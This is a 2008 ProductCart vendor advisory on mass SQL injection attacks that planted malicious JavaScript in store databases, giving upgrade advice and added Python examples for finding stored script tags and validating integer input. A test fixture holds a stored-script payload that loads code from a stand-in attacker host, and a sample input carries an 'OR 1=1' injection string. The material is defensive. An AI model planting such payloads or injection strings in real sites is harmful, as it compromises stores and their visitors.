ProductCart Update - January 2008. This update covers the following topics: integration with Google Website Optimizer; eBay Add-on; integration with the MailUp E-Mail Marketing system; switch to a WIKI-based documentation system. Thanks for being a ProductCart customer! The Early Impact Team

Security Alert - SQL Injection Attacks - 05.20.08

What's happening

A large wave of SQL injection attacks was launched in the last few days (e.g. see PC World's coverage). A successful attack saves malicious JavaScript code snippets into the targeted database; some ProductCart databases have been affected.

The JS scripts are placed into database text fields so that when those field values are displayed on the storefront, the visitor's browser executes the corresponding scripts. The script is then used to launch a malicious attack or to spread itself through further SQL injections (here is a more technical explanation of one of these attacks).
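The stored-script pattern described above can be checked for directly in the store database. The following Python script is an added example, not ProductCart code: it builds a constructed in-memory SQLite catalogue in which one product description has been tampered with, scans every TEXT column for an injected `<script` tag so a compromised row can be found and restored, and shows the output-side mitigation of HTML-encoding field values before they are rendered. ProductCart runs on classic ASP with an MS SQL database; SQLite, the `products` table and the sample rows are assumptions chosen so the example runs offline.

```python
import html
import re
import sqlite3

# The kind of payload the advisory describes: a <script> element (inline or
# with a src= attribute) appended to a text field. Case-insensitive because
# injected markup is often mixed-case to dodge naive filters.
SCRIPT_PATTERN = re.compile(r"<\s*script\b", re.IGNORECASE)

# Constructed sample data: a tiny catalogue in which row 3 has been tampered with.
SAMPLE_ROWS = [
    (1, "Blue Widget", "A reliable widget for everyday use."),
    (2, "Red Widget", "Same widget, different colour."),
    (3, "Green Widget",
     'Colourful widget.<script src="http://attacker.example/x.js"></script>'),
]


def build_sample_db():
    """Create an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)"
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def text_columns(conn, table):
    """Return the names of the TEXT-typed columns of a table.

    table_info rows are (cid, name, type, notnull, dflt_value, pk).
    The table name comes from our own fixed list, never from request input.
    """
    return [
        row[1]
        for row in conn.execute("PRAGMA table_info(%s)" % table)
        if (row[2] or "").upper() == "TEXT"
    ]


def find_injected_script_rows(conn, tables=("products",)):
    """Scan every TEXT column of the given tables and report rows whose value
    contains a <script tag. Returns a list of (table, column, rowid) tuples,
    which is what an operator needs in order to clean or restore those rows."""
    hits = []
    for table in tables:
        cols = text_columns(conn, table)
        if not cols:
            continue
        # Identifiers are taken from PRAGMA output / our constant, so string
        # formatting here does not expose a SQL injection path.
        query = "SELECT rowid, %s FROM %s" % (", ".join(cols), table)
        for row in conn.execute(query):
            rowid, values = row[0], row[1:]
            for col, value in zip(cols, values):
                if value is not None and SCRIPT_PATTERN.search(value):
                    hits.append((table, col, rowid))
    return hits


def render_field(value):
    """HTML-encode a field before it reaches the storefront page, so a stored
    payload is displayed as literal text instead of being run by the browser."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    db = build_sample_db()
    for table, col, rowid in find_injected_script_rows(db):
        print("suspicious script tag in %s.%s (rowid %d)" % (table, col, rowid))
    print(render_field(SAMPLE_ROWS[2][2]))
```

Run the scan against a backup as well as the live database: comparing the two tells you whether the restore point itself is clean, which is the point of the regular backups recommended further down this advisory.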

Vulnerability in ProductCart version 2.7x

Unfortunately it appears that version 2.7x of ProductCart contains a vulnerability that can be exploited. According to our research:

  • The vulnerability cannot be easily patched
  • The best course of action is for any version 2.7x store to turn the store off and proceed to upgrade to the latest ProductCart version (v3.11)

What To Do

  • Stores running ProductCart v2.7x
    Turn the store off and upgrade to the latest version of ProductCart.
  • Stores running ProductCart version 3.x
    If possible, update to the latest version of ProductCart (version 3.11). If not, download and apply all security patches posted for version 3.x (see version 3.x updates).
  • Stores running ProductCart version 3.11
    Make sure that your MS SQL database is regularly backed up so that if there is a problem, you can restore a previous instance of the store database.

We are still collecting information and reviewing the situation. If any vulnerabilities are reported in the current version of ProductCart, please rest assured that we will address them right away.

Technical note

If you have added custom forms to your store, and you are validating fields to check for integers, make sure NOT to use the isNumeric function, but rather use the validNum function defined in the ProductCart file "includes/stringfunctions.asp". We created this function to remove the security issues that arise when the isNumeric VB function is used to validate integers. It was introduced with ProductCart version 3.
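As an added illustration of the technical note, written in Python rather than ASP and not the validNum function from includes/stringfunctions.asp (whose implementation this page does not show): a permissive "is this a number?" test accepts many strings that are not plain integers, so a value that passes it can still be something other than the integer the code expects. The example pairs a strict digits-only validator with a bound-parameter query, so that the value cannot be interpreted as SQL even where validation is later relaxed. `loose_is_numeric` uses Python's float() as a stand-in for a permissive numeric check; it is not VBScript's IsNumeric. The SQLite table and rows are constructed assumptions.

```python
import re
import sqlite3

# A strict integer: optional leading minus, then one or more ASCII digits and
# nothing else (no whitespace, exponents, separators, decimals or hex prefixes).
# [0-9] rather than \d so that non-ASCII Unicode digits are rejected too.
STRICT_INT = re.compile(r"-?[0-9]+")


def is_strict_integer(value):
    """Accept only plain decimal integers such as '42' or '-7'.
    Rejects '1e3', ' 12 ', '12.0', '1_000', 'nan' and any string with
    SQL fragments appended, e.g. '2 OR 1=1'."""
    return isinstance(value, str) and STRICT_INT.fullmatch(value) is not None


def loose_is_numeric(value):
    """Approximation of a permissive numeric test: anything float() parses.
    This is the kind of check the advisory warns against (a stand-in for
    VBScript's IsNumeric, not a reimplementation of it)."""
    try:
        float(value)
        return True
    except (TypeError, ValueError):
        return False


def build_sample_db():
    """Constructed in-memory catalogue with two products."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?)", [(1, "Blue Widget"), (2, "Red Widget")]
    )
    conn.commit()
    return conn


def lookup_product_name(conn, raw_id):
    """Validate the request value strictly, then query with a bound parameter.

    Returns the product name, or None when no such id exists. Raises
    ValueError for anything that is not a plain integer, which is the safe
    default for a value that will select a database row."""
    if not is_strict_integer(raw_id):
        raise ValueError("product id must be a plain integer: %r" % (raw_id,))
    # The '?' placeholder sends the value separately from the SQL text, so
    # even a relaxed validator upstream could not turn it into extra SQL.
    row = conn.execute(
        "SELECT name FROM products WHERE id = ?", (int(raw_id),)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    for sample in ["42", "1e3", " 12 ", "12.0", "2 OR 1=1"]:
        print("%-10r loose=%-5s strict=%s"
              % (sample, loose_is_numeric(sample), is_strict_integer(sample)))
    db = build_sample_db()
    print(lookup_product_name(db, "2"))
```

The two checks are layered on purpose: strict validation keeps malformed values out of the application logic, and parameterised queries keep any value out of the SQL grammar. In a classic ASP store the equivalent of the second layer is an ADODB.Command with Parameters rather than string concatenation into the query text.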